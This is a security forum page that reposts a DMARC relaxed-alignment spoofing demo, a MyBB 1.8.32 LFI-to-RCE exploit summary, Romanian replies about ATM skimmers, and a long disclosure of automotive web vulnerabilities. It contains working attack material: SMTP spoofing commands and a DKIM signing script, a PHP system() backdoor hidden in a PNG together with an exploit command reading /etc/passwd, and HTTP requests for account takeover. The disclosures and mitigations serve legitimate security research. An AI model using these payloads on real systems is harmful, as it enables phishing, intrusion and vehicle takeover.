work. “Relaxed” DMARC configuration The DMARC configuration of the target domain needs to allow for “relaxed” mode of SPF Authenticated Identifiers and/or DKIM Authenticated Identifiers. This, though, is the default behaviour if the aspf or adkim settings have not been set. Hence, the following DMARC policy is vulnerable: $ dig +short txt _dmarc.altf8.fr "v=DMARC1; p=reject; sp=reject" So would be this one: $ dig +short txt _dmarc.altf8.fr "v=DMARC1; p=reject; sp=reject; aspf=r; adkim=r" But that one is not: $ dig +short txt _dmarc.altf8.fr "v=DMARC1; p=reject; sp=reject; aspf=s; adkim=s" For the following demonstration, the first policy above was in use. Preparation Let’s set some DNS records on the dangling.com domain that we registered and control. The subdomain takeover: sub IN CNAME server.dangling.com server.dangling.com is identified by: server IN A 1.2.3.4 MX record for the controlled server: target IN MX 10 server.dangling.com So now, takeover.altf8.fr points to the controlled server which is allowed to send mails for sub.dangling.com: $ dig +short takeover.altf8.fr sub.dangling.com. 1.2.3.4 $ dig +short mx takeover.altf8.fr sub.dangling.com. 10 server.dangling.com. Passing SPF The SPF Authenticated Identifiers definition states : In relaxed mode, the SPF-authenticated domain and RFC5322.From domain must have the same Organizational Domain. In strict mode, only an exact DNS domain match is considered to produce Identifier Alignment. The “SPF-authenticated domain” is taken from the SMTP MAIL FROM command. The From domain is taken from the MIME header with the same name. When a mail is received, the MAIL FROM domain value is extracted and the corresponding SPF record is requested then used. This is the behaviour of most mail agents. If relaxed mode is enabled, one can send a subdomain in MAIL FROM and a domain in From with the same organizational domain and SPF will still pass: For example, if a message passes an SPF check with an RFC5321.MailFrom domain of “cbg.bounces.altf8.fr”, and the address portion of the RFC5322.From field contains “payments@altf8.fr”, the Authenticated RFC5321.MailFrom domain identifier and the RFC5322.From domain are considered to be “in alignment” in relaxed mode, but not in strict mode. In our example, we control the SPF record for sub.dangling.com. We set it to: sub IN TXT "v=spf1 mx -all" Which means “all IPs associated with MX records in the sub.dangling.com domain will be authorized to send mails”. Because of the subdomain takeover and how DNS resolution work, we now have a SPF record for takeover.altf8.fr: $ dig +short txt takeover.altf8.fr | grep spf "v=spf1 mx -all" And because we set server.dangling.com as a valid MX, we can now send emails from it. We can do that on the command line of server.dangling.com (altf8.fr uses Microsoft 365, hence why the outlook.com SMTP server below): $ curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt [...] * TCP_NODELAY set * Expire in 149967 ms for 3 (transfer 0x55aad3f5a0f0) * Expire in 200 ms for 4 (transfer 0x55aad3f5a0f0) * Connected to [altf8-fr.mail.protection.outlook.com](http://altf8-fr.mail.protection.outlook.com) (104.47.24.36) port 25 (#0) < 220 [PR2FRA01FT014.mail.protection.outlook.com](http://PR2FRA01FT014.mail.protection.outlook.com) Microsoft ESMTP MAIL Service ready at Mon, 23 Jan 2023 15:55:16 +0000 > EHLO mail.txt < [250-PR2FRA01FT014.mail.protection.outlook.com](http://250-PR2FRA01FT014.mail.protection.outlook.com) Hello [1.2.3.4] < 250-SIZE 157286400 < 250-PIPELINING < 250-DSN < 250-ENHANCEDSTATUSCODES < 250-STARTTLS < 250-8BITMIME < 250-BINARYMIME < 250-CHUNKING < 250 SMTPUTF8 > MAIL FROM:<ceo@takeover.altf8.fr> SIZE=140 < 250 2.1.0 Sender OK > RCPT TO:<jbencteux@altf8.fr> < 250 2.1.5 Recipient OK > DATA < 354 Start mail input; end with <CRLF>.<CRLF> } [140 bytes data] * We are completely uploaded and fine 100 140 0 0 100 140 0 185 --:--:-- --:--:-- --:--:-- 185< 250 2.6.0 <b427960e-4306-42a2-9121-fefaaa105def@PR2FRA01FT014.eop-fra01.prod.protection.outlook.com> [InternalId=68521908309720, Hostname=MRZP264MB2425.FRAP264.PROD.OUTLOOK.COM] 8276 bytes in 0.036, 220.364 KB/sec Queued mail for delivery 100 140 0 0 100 140 0 185 --:--:-- --:--:-- --:--:-- 185 * Connection #0 to host [altf8-fr.mail.protection.outlook.com](http://altf8-fr.mail.protection.outlook.com) left intact This is the content of mail.txt: From: ceo@altf8.fr To: jbencteux@altf8.fr Subject: You are fired Hi Jeff, Sorry to tell you this way, but you're out. Best regards, CEO Note the difference of sender in --mail-from and in the From of mail.txt which what the RFC states as allowed when in relaxed SPF alignment. The email is received in the Outlook inbox of jbencteux@altf8.fr, passing the spam filters: Its MIME headers states SPF passes: Received-SPF: Pass (protection.outlook.com: domain of takeover.altf8.fr designates 1.2.3.4 as permitted sender) Note that DMARC passes as well: Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=none (message not signed) header.d=none;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100 This is because if no DKIM is present (dkim=none) but SPF passes, then DMARC passes. This is a by-design property of DMARC. Ok cool, but the mail is not cryptographically signed and other mail agents might put it in the spam folder for a lack of signature, let’s see if we can get DKIM working. (Kind of) Passing DKIM In a similar fashion than SPF Auth identifiers exists, there are DKIM Authenticated Identifiers: In relaxed mode, the Organizational Domains of both the [[DKIM](https://www.rfc-editor.org/rfc/rfc7489#ref-DKIM ““DomainKeys Identified Mail (DKIM) Signatures”")]- authenticated signing domain (taken from the value of the “d=” tag in the signature) and that of the RFC5322.From domain must be equal if the identifiers are to be considered aligned. In strict mode, only an exact match between both of the Fully Qualified Domain Names (FQDNs) is considered to produce Identifier Alignment. Which means that if DMARC contains adkim=r (or no adkim, as r value is the default one) there could be a d=takeover.altf8.fr in the DKIM signature and a From sender ending in @altf8.fr and DKIM would still pass. Let’s try that. Generate a private key for DKIM signing on server.dangling.com: $ openssl genrsa -out dkim_priv.pem 2048 Get the corresponding public key in base64: $ openssl rsa -in dkim_priv.pem -pubout -outform der 2>/dev/null | openssl base64 -A Ayw[...]zkwA Construct and publish a DKIM record with the obtained public key on our dangling.com DNS zone (s1 is taken as an arbitrary selector): s1._domainkey IN TXT "v=DKIM1; k=rsa; p=Ayw[...]zkwA" $ dig +short txt s1._domainkey.sub.dangling.com "v=DKIM1; k=rsa; p=Ayw[...]zkwA" Sign a mail with the private key using the following python script using dkimpy: import dkim mail = open("mail.txt", "rb").read() selector = b"s1" domain = b"takeover.altf8.fr" privkey = open("dkim_priv.pem", "rb").read() signature = dkim.sign(mail, selector, domain, privkey) print(signature.decode("utf-8")) It gives the following signature that we add to mail.txt: $ ./dkim_sign.py DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=takeover.altf8.fr; i=@takeover.altf8.fr; q=dns/txt; s=s1; t=1674566236; h=from : to : subject : from; bh=NMaimuhdFbPt4JjfYY6BdaVpYo+/BdWvjw0bnsS9iY8=; b=eV4zAv9pVlDFmFN3DIYBX+hSRq/t4wyXCHbuyEB7GmWha3O8n1rxSyzyn1j15OREU uy6erbTUck2[...]3YxVk/ejgidpedmYoSnl8VChsmXZFsmMeMuuujALo4H1iIG 8EhOesBGxeylmHZI5hGapmzReVyjTyyvoQQP9ymRRAT0uyV3Dej+cxDZ7AVfC7fdzW YFlcH69vbTryw== We then send the signed mail: curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt And the result of the email authentication is as such: Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=fail (no key for signature) header.d=takeover.altf8.fr;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100 It fails because the mail agent tries to get a DKIM public key DNS record for s1._domainkey.takeover.altf8.fr and that resolves to… nothing. It does not automatically point to s1._domainkey.sub.dangling.com so the DNS response is empty, hence the “no key for signature”. Which mean (AFAIK) there is no valid altf8.fr domain DKIM signature that can be generated from a subdomain takeover. One would need control over *.altf8.fr to make it possible. However, as a hackish way of improving the mail looks, it is still possible to sign it for another domain to try passing more antispam defences. Even if that domain is not our targeted altf8.fr domain (marketing platforms do sign mails for other domains all the time). We can take the subdomain sub.dangling.com as an example. If we reuse our script to sign the mail with sub.dangling.com: DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=sub.dangling.com; i=@sub.dangling.com; q=dns/txt; s=s1; t=1674566236; h=from : to : subject : from; bh=NMaimuhdFbPt4JjfYY6BdaVpYo+/BdWvjw0bnsS9iY8=; b=gdRYJ8lajpHd4DZfbqOLNtvaqH+tSsbyTM2o3Px3EuTEcAFO6wTe+eLKzQWAiZ6CiNg0l udHoSAd9XJfkjBuP[...]V4Hlg02qSoNmNZOiA/Oj3g53eTf+uoNQdAHT/qjEVBeAN0S hzrmGnN8B8cynWNSIVOw9Pwmqj2nmPTzEYDhJOE7aIiIrlJz59/rhQFUBYrA== curl -vvvv smtp://altf8-fr.mail.protection.outlook.com --mail-from 'ceo@takeover.altf8.fr' --mail-rcpt 'jbencteux@altf8.fr' --upload-file mail.txt We then get a passing DKIM: Authentication-Results: spf=pass (sender IP is 1.2.3.4) smtp.mailfrom=takeover.altf8.fr; dkim=pass (signature was verified) header.d=sub.dangling.com;dmarc=pass action=none header.from=altf8.fr;compauth=pass reason=100 While this will not fool spam filters checking that the signing domain is the sender domain (which they should), it sometimes is enough to have the mail being signed by any domain to pass misconfigured defences. Our mail is now: Passing SPF Passing DMARC Passing DKIM but not for the sender’s domain This can trick a lot of mail clients into believing this email is legit, including Outlook, the tested one for this example. Conclusion While prerequisites for this type of attack is high, it is not unlikely that attackers will use subdomain takeovers in order to be able to forge convincing phishing emails. This could also be a good tactic from a red team point of view as it minimize the interaction between the targeted domain and the operator (a few DNS requests are needed) until the final phishing mail is sent. To avoid and mitigate this issue, I suggest to: Regularly checking your DNS for unused records and removing them to avoid subdomain takeovers If DMARC relaxed modes are not needed, setting the following in your DMARC DNS records: aspf=s; adkim=s; References RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email, Version 1 (rfc-editor.org) RFC 6376: DomainKeys Identified Mail (DKIM) Signatures (rfc-editor.org) RFC 7489: Domain-based Message Authentication, Reporting, and Conformance (DMARC) (rfc-editor.org) How to create a DKIM record with OpenSSL - Mailhardener knowledge base Quickstart to DKIM Sign Email with Python – Russell Ballestrini Frankie Goes To Hollywood - Relax (Official Video) - YouTube Sursa: https://www.bencteux.fr/posts/dmarc_relax/
-
MyBB 1.8.32 - Chained LFI Remote Code Execution (RCE) (Authenticated) detailed analyse to mybb 1.8.32 代码审计 + LFI RCE 复现 (1). An RCE can be obtained on MyBB's Admin CP in Configuration -> Profile Options -> Avatar Upload Path. to change Avatar Upload Path to /inc to bypass blacklist upload dir. (2). after doing that, then we are able to chain in "admin avatar upload" page: http://www.mybb1832.cn/admin/index.php?module=user-users&action=edit&uid=1#tab_avatar, and LFI in "Edit Language Variables" page: http://www.mybb1832.cn/admin/index.php?module=config-languages&action=edit&lang=english. (3). This chained bugs can lead to Authenticated RCE. (note). The user must have rights to add or update settings and update Avatar. This is tested on MyBB 1.8.32. Exp Usage: first choose a png file that size less than 1kb then merge the png file with a php simple backdoor file using the following commands mac@xxx-2 php-backdoor % cat simple-backdoor.php <?php if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo(); } ?> mac@xxx-2 php-backdoor % ls simple-backdoor.php test.png mac@xxx-2 php-backdoor % cat simple-backdoor.php >> test.png mac@xxx-2 php-backdoor % file test.png test.png: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced finally run the following commands to run the exp script to get RCE output! enjoy the shell... python3 exp.py --host http://www.xxx.cn --username admin --password xxx --email xxx@qq.com --file avatar_1.png --cmd "cat /etc/passwd" reference mybb 1.8.32 RCE in admin panel report MyBB MyBB github 记一次mybb代码审计 mybb bugs in exploit database Sursa: https://github.com/FDlucifer/mybb_1832_LFI_RCE
-
Sunt de acord ca sunt multe metode, inclusiv "full frame" sau chiar bancomate false: https://krebsonsecurity.com/2013/12/the-biggest-skimmers-of-all-fake-atms/ Fac si eu basic ce se poate, oricum am mai multe conturi pe care le folosesc, chiar daca prinde cineva datele de card inclusiv PIN, e limitat damage-ul
-
Eu pot doar sa recomand IPBoard si sa te sfatuiesc sa te feresti de vBulletin. Licenta IPBoard de pe RST e "standalone", adica eu ma ocup (cu Zatarra) de infrastructura - un server dedicat, si licenta doar a fost activata din Admin CP. Pretul depinde de serviciile auxiliare pe care le iei, aici gasesti detalii: https://invisioncommunity.com/buy/self-hosted/ PS: Nu e tocmai complicat de instalat si configurat, necesita cunostiinele clasice de Linux + PHP/MariaDB/Apache sau similare.
-
Cum îmi fura hackerii datele de pe banda magnetica?
Nytro replied to viano1's topic in Tutoriale in romana
Nu, deoarece PIN-ul nu se afla pe banda magnetica. Dar se pot face plati online. Ajuta 3D secure partial, e util doar daca site-urile de pe care ar putea cumpara online (sau procesatorii de plata) chiar implementeaza si ei 3D secure, ceea ce nu prea se intampla pe la americani (si site-urile lor). -
Iti poate fura datele de card (depinde de skimmer, poate contine si PIN-ul). Eu mereu trag de chestia de inserat cardul si tastatura + tin portofelul deasupra tastaturii cand bag PIN-ul in caz de camera. Important, cred ca am mai spus pe aici: daca gasiti un skimmer, il puneti la loc si plecati de acolo. Apoi sunati la politie, banca sau ce vreti voi. Sfatul l-am primit de la cineva de la o banca care se ocupa cu protejarea ATM-urile de skimmere. Ideea era simpla: o dracie de skimmer e foarte scumpa iar boschetarii care o au sunt in stare sa va taie, doar sa nu o piarda.
-
Cum îmi fura hackerii datele de pe banda magnetica?
Nytro replied to viano1's topic in Tutoriale in romana
Pe banda magnetica se afla datele cardului, copia lor se face printr-un swipe (trecere a cardului prin acea fasie). La noi in tara nu am folosit niciodata in viata metoda asta, doar pe la americani am folosit. -
Eu nu am auzit chestii de rau despre ei.
-
E relativ normal, vin o gramada de mizerii, destul de multe duplicate, pare OK ca numar.
-
Oh, nice, credeam ca nu mai merge serviciul.
-
Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More January 3, 2023 samwcyo During the fall of 2022, a few friends and I took a road trip from Chicago, IL to Washington, DC to attend a cybersecurity conference and (try) to take a break from our usual computer work. While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn't resist poking at the scooter's mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight. When everything eventually settled down, we sent a report over to the scooter manufacturer and became super interested in trying to more ways to make more things honk. We brainstormed for a while, and then realized that nearly every automobile manufactured in the last 5 years had nearly identical functionality. If an attacker were able to find vulnerabilities in the API endpoints that vehicle telematics systems used, they could honk the horn, flash the lights, remotely track, lock/unlock, and start/stop vehicles, completely remotely. At this point, we started a group chat and all began to work with the goal of finding vulnerabilities affecting the automotive industry. Over the next few months, we found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports it. Findings Summary During our engagement, we found the following vulnerabilities in the companies listed below: Kia, Honda, Infiniti, Nissan, Acura Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number Fully remote account takeover and PII disclosure via VIN number (name, phone number, email address, physical address) Ability to lock users out of remotely managing their vehicle, change ownership For Kia’s specifically, we could remotely access the 360-view camera and view live images from the car Mercedes-Benz Access to hundreds of mission-critical internal applications via improperly configured SSO, including… Multiple Github instances behind SSO Company-wide internal chat tool, ability to join nearly any channel SonarQube, Jenkins, misc. build servers Internal cloud deployment services for managing AWS instances Internal Vehicle related APIs Remote Code Execution on multiple systems Memory leaks leading to employee/customer PII disclosure, account access Hyundai, Genesis Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the victim email address Fully remote account takeover and PII disclosure via victim email address (name, phone number, email address, physical address) Ability to lock users out of remotely managing their vehicle, change ownership BMW, Rolls Royce Company-wide core SSO vulnerabilities which allowed us to access any employee application as any employee, allowed us to… Access to internal dealer portals where you can query any VIN number to retrieve sales documents for BMW Access any application locked behind SSO on behalf of any employee, including applications used by remote workers and dealerships Ferrari Full zero-interaction account takeover for any Ferrari customer account IDOR to access all Ferrari customer records Lack of access control allowing an attacker to create, modify, delete employee “back office” administrator user accounts and all user accounts with capabilities to modify Ferrari owned web pages through the CMS system Ability to add HTTP routes on api.ferrari.com (rest-connectors) and view all existing rest-connectors and secrets associated with them (authorization headers) Spireon Multiple vulnerabilities, including: Full administrator access to a company-wide administration panel with ability to send arbitrary commands to an estimated 15.5 million vehicles (unlock, start engine, disable starter, etc.), read any device location, and flash/update device firmware Remote code execution on core systems for managing user accounts, devices, and fleets. Ability to access and manage all data across all of Spireon Ability to fully takeover any fleet (this would’ve allowed us to track & shut off starters for police, ambulances, and law enforcement vehicles for a number of different large cities and dispatch commands to those vehicles, e.g. “navigate to this location”) Full administrative access to all Spireon products, including the following… GoldStar - https://www.spireon.com/products/goldstar/ LoJack - https://www.spireon.com/products/goldstar/lojackgo/ FleetLocate - https://www.spireon.com/products/fleetlocate-for-fleet-managers/ NSpire - https://www.spireon.com/spireon-nspire-platform/ Trailer & Asset - https://www.spireon.com/solutions/trailer-asset-managers/ In total, there were… 15.5 million devices (mostly vehicles) 1.2 million user accounts (end user accounts, fleet managers, etc.) Ford Full memory disclosure on production vehicle Telematics API discloses Discloses customer PII and access tokens for tracking and executing commands on vehicles Discloses configuration credentials used for internal services related to Telematics Ability to authenticate into customer account and access all PII and perform actions against vehicles Customer account takeover via improper URL parsing, allows an attacker to completely access victim account including vehicle portal Reviver Full super administrative access to manage all user accounts and vehicles for all Reviver connected vehicles. An attacker could perform the following: Track the physical GPS location and manage the license plate for all Reviver customers (e.g. changing the slogan at the bottom of the license plate to arbitrary text) Update any vehicle status to “STOLEN” which updates the license plate and informs authorities Access all user records, including what vehicles people owned, their physical address, phone number, and email address Access the fleet management functionality for any company, locate and manage all vehicles in a fleet Porsche Ability to send retrieve vehicle location, send vehicle commands, and retrieve customer information via vulnerabilities affecting the vehicle Telematics service Toyota IDOR on Toyota Financial that discloses the name, phone number, email address, and loan status of any Toyota financial customers Jaguar, Land Rover User account IDOR disclosing password hash, name, phone number, physical address, and vehicle information SiriusXM Leaked AWS keys with full organizational read/write S3 access, ability to retrieve all files including (what appeared to be) user databases, source code, and config files for Sirius Vulnerability Writeups (1) Full Account Takeover on BMW and Rolls Royce via Misconfigured SSO While testing BMW assets, we identified a custom SSO portal for employees and contractors of BMW. This was super interesting to us, as any vulnerabilities identified here could potentially allow an attacker to compromise any account connected to all of BMWs assets. For instance, if a dealer wanted to access the dealer portal at a physical BMW dealership, they would have to authenticate through this portal. Additionally, this SSO portal was used to access internal tools and related devops infrastructure. The first thing we did was fingerprint the host using OSINT tools like gau and ffuf. After a few hours of fuzzing, we identified a WADL file which exposed API endpoints on the host via sending the following HTTP request: GET /rest/api/application.wadl HTTP/1.1 Host: xpita.bmwgroup.com The HTTP response contained all available REST endpoints on the xpita host. We began enumerating the endpoints and sending mock HTTP requests to see what functionality was available. One immediate finding was that we were able to query all BMW user accounts via sending asterisk queries in the user field API endpoint. This allowed us to enter something like “sam*” and retrieve the user information for a user named “sam.curry” without having to guess the actual username. HTTP Request GET /reset/api/users/example* HTTP/1.1 Host: xpita.bmwgroup.com HTTP Response HTTP/1.1 200 OK Content-type: application/json {“id”:”redacted”,”firstName”:”Example”,”lastName”:”User”,”userName”:”example.user”} Once we found this vulnerability, we continued testing the other accessible API endpoints. One particularly interesting one which stood out immediately was the “/rest/api/chains/accounts/:user_id/totp” endpoint. We noticed the word “totp” which usually stood for one-time password generation. When we sent an HTTP request to this endpoint using the SSO user ID gained from the wildcard query paired with the TOTP endpoint, it returned a random 7-digit number. The following HTTP request and response demonstrate this behavior: HTTP Request GET /rest/api/chains/accounts/unique_account_id/totp HTTP/1.1 Host: xpita.bmwgroup.com HTTP Response HTTP/1.1 200 OK Content-type: text/plain 9373958 For whatever reason, it appeared that this HTTP request would generate a TOTP for the user’s account. We guessed that this interaction worked with the “forgot password” functionality, so we found an example user account by querying “example*” using our original wildcard finding and retrieving the victim user ID. After retrieving this ID, we initiated a reset password attempt for the user account until we got to the point where the system requested a TOTP code from the user’s 2FA device (e.g. email or phone). At this point, we retrieved the TOTP code generated from the API endpoint and entered it into the reset password confirmation field. It worked! We had reset a user account, gaining full account takeover on any BMW employee and contractor user. At this point, it was possible to completely take over any BMW or Rolls Royce employee account and access tools used by those employees. To demonstrate the impact of the vulnerability, we simply Googled “BMW dealer portal” and used our account to access the dealer portal used by sales associates working at physical BMW and Rolls Royce dealerships. After logging in, we observed that the demo account we took over was tied to an actual dealership, and we could access all of the functionality that the dealers themselves had access to. This included the ability to query a specific VIN number and retrieve sales documents for the vehicle. With our level of access, there was a huge amount of functionality we could’ve performed against BMW and Rolls Royce customer accounts and customer vehicles. We stopped testing at this point and reported the vulnerability. The vulnerabilities reported to BMW and Rolls Royce have since been fixed. (2) Remote Code Execution and Access to Hundreds of Internal Tools on Mercedes-Benz and Rolls Royce via Misconfigured SSO Early in our testing, someone in our group had purchased a Mercedes-Benz vehicle and so we began auditing the Mercedes-Benz infrastructure. We took the same approach as BMW and began testing the Mercedes-Benz employee SSO. We weren’t able to find any vulnerabilities affecting the SSO portal itself, but by exploring the SSO website we observed that they were running some form of LDAP for the employee accounts. Based on our high level understanding of their infrastructure, we guessed that the individual employee applications used a centralized LDAP system to authenticate users. We began exploring each of these websites in an attempt to find a public registration so we could gain SSO credentials to access, even at a limited level, the employee applications. After fuzzing random sites for a while, we eventually found the “umas.mercedes-benz.com” website which was built for vehicle repair shops to request specific tools access from Mercedes-Benz. The website had public registration enabled as it was built for repair shops and appeared to write to the same database as the core employee LDAP system. We filled out all the required fields for registration, created a user account, then used our recon data to identify sites which redirected to the Mercedes-Benz SSO. The first one we attempted was a pretty obvious employee tool, it was “git.mercedes-benz.com”, short for Github. We attempted to use our user credentials to sign in to the Mercedes-Benz Github and saw that we were able to login. Success! The Mercedes-Benz Github, after authenticating, asked us to set up 2FA on our account so we could access the app. We installed the 2FA app and added it to our account, entered our code, then saw that we were in. We had access to “git.mercedes-benz.com” and began looking around. After a few minutes, we saw that the Github instance had internal documentation and source code for various Mercedes-Benz projects including the Mercedes Me Connect app which was used by customers to remotely connect to their vehicles. The internal documentation gave detailed instructions for employees to follow if they wanted to build an application for Mercedes-Benz themselves to talk to customer vehicles and the specific steps one would have to take to talk to customer vehicles. At this point, we reported the vulnerability, but got some pushback after a few days of waiting on an email response. The team seemed to misunderstand the impact, so they asked us to demonstrate further impact. We used our employee account to login to numerous applications which contained sensitive information and achieved remote code execution via exposed actuators, spring boot consoles, and dozens of sensitive internal applications used by Mercedes-Benz employees. One of these applications was the Mercedes-Benz Mattermost (basically Slack). We had permission to join any channel, including security channels, and could pose as a Mercedes-Benz employee who could ask whatever questions necessary for an actual attacker to elevate their privileges across the Benz infrastructure. To give an overview, we could access the following services: Multiple employee-only Githubs with sensitive information containing documentation and configuration files for multiple applications across the Mercedes-Benz infrastructure Spring boot actuators which lead to remote code execution, information disclosure, on sensitive employee and customer facing applications Jenkins instances AWS and cloud-computing control panels where we could request, manage, and access various internal systems XENTRY systems used to communicate with customer vehicles Internal OAuth and application-management related functionality for configuring and managing internal apps Hundreds of miscellaneous internal services (3) Full Vehicle Takeover on Kia via Deprecated Dealer Portal When we looked at Kia, we noticed how its vehicle enrollment process was different from its parent company Hyundai. We mapped out all of the domains and we came across the “kdelaer.com” domain where dealers are able to register for an account to activate Kia connect for customers who purchase vehicles. At this point, we found the domain “kiaconnect.kdealer.com” which allowed us to enroll an arbitrary VIN but required a valid session to work. While looking at the website’s main.js code, we observed the following authorization functionality for generating the token required to access the website functionality: validateSSOToken() { const e = this.geturlParam("token"), i = this.geturlParam("vin"); return this.postOffice({ token: e, vin: i }, "/prof/gbl/vsso", "POST", "preLogin").pipe(ye(this.processSuccessData), Nn(this.handleError)) } Since we didn’t have valid authorization credentials, we continued to search through the JavaScript file until finding the “prelogin” header. This header, when sent, allowed us to initiate enrollment for an arbitrary VIN number. Although we were able to bypass the authorization check for VIN ownership, the website continued throwing errors for an invalid session. To bypass this, we took a session token from “owners.kia.com” (the site used for customers to remotely connect to their vehicles) and appended it to our request to pair the VIN number to a customer account here: Something really interesting to note: for every Kia account that we queried, the server returned an associated profile with the email “daspike11@yahoo.com”. We’re not sure if this email address has access to the user account, but based on our understanding of the Kia website it appeared that the email address was connected to every account that we had searched. We’ve asked the Kia team for clarification but haven’t heard back on what exactly this is. Now that we had a valid vehicle initialization session, we could use the JSON returned in the HTTP response returned from pairing the customer’s account to continue the vehicle takeover. We would use the “prelogin” header once again to generate a dealer token (intended to be accessed by Kia dealers themselves) to pair any vehicle to the attacker’s customer account. Lastly, we can just head to the link to finish the activation and enrollment which you can see below here. The attacker will receive a link via email on their Kia customer account after the above dealer pairing process is completed. The activation portal below is the final step to pair the Kia vehicle to the attacker’s customer account. Lastly, after we’ve filled out the above form, it takes about 1-2 minutes for Kia Connect to fully activate and give full access to send lock, unlock, remote start, remote stop, locate, and (most interestingly) remotely access vehicle cameras! (4) Full Account Takeover on Ferrari and Arbitrary Account Creation allows Attacker to Access, Modify, and Delete All Customer Information and Access Administrative CMS Functionality to Manage Ferrari Websites When we began targeting Ferrari, we mapped out all domains under the publicly available domains like “ferrari.com” and browsed around to see what was accessible. One target we found was “api.ferrari.com”, a domain which offered both customer facing and internal APIs for Ferrari systems. Our goal was to get the highest level of access possible for this API. We analyzed the JavaScript present on several Ferrari subdomains that looked like they were for use by Ferrari dealers. These subdomains included `cms-dealer.ferrari.com`, `cms-new.ferrari.com` and `cms-dealer.test.ferrari.com`. One of the patterns we notice when testing web applications is poorly implemented single sign on functionality which does not restrict access to the underlying application. This was the case for the above subdomains. It was possible to extract the JavaScript present for these applications, allowing us to understand the backend API routes in use. When reverse engineering JavaScript bundles, it is important to check what constants have been defined for the application. Often these constants contain sensitive credentials or at the very least, tell you where the backend API is, that the application talks to. For this application, we noticed the following constants were set: const i = { production: !0, envName: "production", version: "0.0.0", build: "20221223T162641363Z", name: "ferrari.dws-preowned.backoffice", formattedName: "CMS SPINDOX", feBaseUrl: "https://{{domain}}.ferraridealers.com/", fePreownedBaseUrl: "https://{{domain}}.ferrari.com/", apiUrl: "https://api.ferrari.com/cms/dws/back-office/", apiKey: "REDACTED", s3Bucket: "ferrari-dws-preowned-pro", cdnBaseUrl: "https://cdn.ferrari.com/cms/dws/media/", thronAdvUrl: "https://ferrari-app-gestioneautousate.thron.com/?fromSAML#/ad/" } From the above constants we can understand that the base API URL is `https://api.ferrari.com/cms/dws/back-office/` and a potential API key for this API is `REDACTED`. Digging further into the JavaScript we can look for references to `apiUrl` which will inform us as to how this API is called and how the API key is being used. For example, the following JavaScript sets certain headers if the API URL is being called: })).url.startsWith(x.a.apiUrl) && !["/back-office/dealers", "/back-office/dealer-settings", "/back-office/locales", "/back-office/currencies", "/back-office/dealer-groups"].some(t => !!e.url.match(t)) && (e = (e = e.clone({ headers: e.headers.set("Authorization", "" + (s || void 0)) })).clone({ headers: e.headers.set("x-api-key", "" + a) })); All the elements needed for this discovery were conveniently tucked away in this JavaScript file. We knew what backend API to talk to and its routes, as well as the API key we needed to authenticate to the API. Within the JavaScript, we noticed an API call to `/cms/dws/back-office/auth/bo-users`. When requesting this API through Burp Suite, it leaked all of the users registered for the Ferrari Dealers application. Furthermore, it was possible to send a POST request to this endpoint to add ourselves as a super admin user. While impactful, we were still looking for a vulnerability that affected the broader Ferrari ecosystem and every end user. Spending more time deconstructing the JavaScript, we found some API calls were being made to `rest-connectors`: return t.prototype.getConnectors = function() { return this.httpClient.get("rest-connectors") }, t.prototype.getConnectorById = function(t) { return this.httpClient.get("rest-connectors/" + t) }, t.prototype.createConnector = function(t) { return this.httpClient.post("rest-connectors", t) }, t.prototype.updateConnector = function(t, e) { return this.httpClient.put("rest-connectors/" + t, e) }, t.prototype.deleteConnector = function(t) { return this.httpClient.delete("rest-connectors/" + t) }, t.prototype.getItems = function() { return this.httpClient.get("rest-connector-models") }, t.prototype.getItemById = function(t) { return this.httpClient.get("rest-connector-models/" + t) }, t.prototype.createItem = function(t) { return this.httpClient.post("rest-connector-models", t) }, t.prototype.updateItem = function(t, e) { return this.httpClient.put("rest-connector-models/" + t, e) }, t.prototype.deleteItem = function(t) { return this.httpClient.delete("rest-connector-models/" + t) }, t The following request unlocked the final piece in the puzzle. Sending the following request revealed a treasure trove of API credentials for Ferrari: : GET /cms/dws/back-office/rest-connector-models HTTP/1.1 To explain what this endpoint's purpose was: Ferrari had configured a number of backend APIs that could be communicated with by hitting specific paths. When hitting this API endpoint, it returned this list of API endpoints, hosts and authorization headers (in plain text). This information disclosure allowed us to query Ferrari’s production API to access the personal information of any Ferrari customer. In addition to being able to view these API endpoints, we could also register new rest connectors or modify existing ones. HTTP Request GET /core/api/v1/Users?email=ian@ian.sh HTTP/1.1 Host: fcd.services.ferrari.com HTTP Response HTTP/1.1 200 OK Content-type: application/json …"guid":"2d32922a-28c4-483e-8486-7c2222b7b59c","email":"ian@ian.sh","nickName":"ian@ian.sh","firstName":"Ian","lastName":"Carroll","birthdate":"1963-12-11T00:00:00"… The API key and production endpoints that were disclosed using the previous staging API key allowed an attacker to access, create, modify, and delete any production user account. It additionally allowed an attacker to query users via email address or nickname. Additionally, an attacker could POST to the “/core/api/v1/Users/:id/Roles” endpoint to edit their user roles, setting themselves to have super-user permissions or become a Ferrari owner. This vulnerability would allow an attacker to access, modify, and delete any Ferrari customer account with access to manage their vehicle profile. (5) SQL Injection and Regex Authorization Bypass on Spireon Systems allows Attacker to Access, Track, and Send Arbitrary Commands to 15 million Telematics systems and Additionally Fully Takeover Fleet Management Systems for Police Departments, Ambulance Services, Truckers, and Many Business Fleet Systems When identifying car-related 